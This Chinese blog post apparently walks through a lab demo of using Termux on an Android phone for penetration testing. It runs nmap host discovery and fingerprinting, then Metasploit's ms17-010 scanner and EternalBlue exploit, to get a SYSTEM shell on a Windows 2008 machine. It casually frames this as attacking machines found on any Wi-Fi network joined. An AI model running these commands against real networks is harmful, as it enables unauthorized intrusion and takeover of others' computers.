至少我们曾经在一起过。
来自:一言
var xhr = new XMLHttpRequest(); xhr.open('get', 'https://v1.hitokoto.cn/'); xhr.onreadystatechange = function () { if (xhr.readyState === 4) { var data = JSON.parse(xhr.responseText); var hitokoto = document.getElementById('hitokoto'); hitokoto.innerText = data.hitokoto; } } xhr.send();
介绍
Termux
是一个Android
下一个高级的终端模拟器,开源且不需要root
,支持apt
管理软件包,十分方便安装软件包,完美支持Python
,PHP
,Ruby
,Go
,Nodejs
,MySQL
等。随着智能设备的普及和性能的不断提升,如今的手机、平板等的硬件标准已达到了初级桌面计算机的硬件标准,用心去打造完全可以把手机变成一个强大的工具.
- 官网
- Github项目地址
- Google Play下载地址
这里我就不再多做介绍了,详细的安装教程可以看这个https://www.sqlsec.com/2018/05/termux.html
前言
Termux终端安装在安卓手机上,就相当于是一个便携式服务器,可以下载Metasploit,Nmap,Sqlmap,hydra等渗透测试工具,可以走到哪儿扫到哪儿,舒服就完事了[aru_23],等于一个移动kali。
环境模拟
当你拿着手机连上一个wifi,通过扫描发现局域网内存在一台在线的电脑,并且存在漏洞,所以需要进行一些简单的扫描渗透测试,所以就要利用到Termux来实现,拿到目标权限。[aru_32]
安卓手机ip:192.168.2.100
目标主机ip:未知
测试开始
1.先使用nmap扫描局域网内存活的主机。
代码语言:javascript复制nmap -sP 192.168.2.0/24
温馨提示
通过扫描可以知道,IP:192.168.2.1 是路由器地址,IP:192.168.2.100 是我们手机地址,IP:192.168.2.106 是目标地址
2.探测目标主机详细信息,可以用-A
代码语言:javascript复制nmap -A 192.168.2.106
温馨提示
通过nmap扫描可以知道目标主机是win2008系统(ps:没有win7的镜像~就用这个演示一下[aru_15]),并且开启了smb服务,所以我们可以试试扫描目标主机是否存在ms17-010漏洞
3.利用Metasploit扫描目标是否存在漏洞
代码语言:javascript复制msfconsole #进入Metasploit
search ms17-010 #搜索漏洞
use auxiliary/scanner/smb/smb_ms17-010 #使用ms17-010扫描服务
set rhost 192.168.2.106 #设置目标地址
run #执行
经过扫描,目标存在ms17-010漏洞,接下来就可以直接利用漏洞反弹shell了
4.反弹shell
代码语言:javascript复制use exploit/windows/smb/ms17_010_eternalblue #使用该漏洞
set rhost 192.168.2.106 #设置目标
run #执行
温馨提示
这里就攻击成功,直接反弹shell了,并且权限为system权限。[aru_15]
总结
又水了一篇文章~这个教程就是简单的演示一下如何用手机使用Metasploit等工具进行渗透测试,并且还可以使用sqlmap,走到哪儿注入到哪儿[aru_17]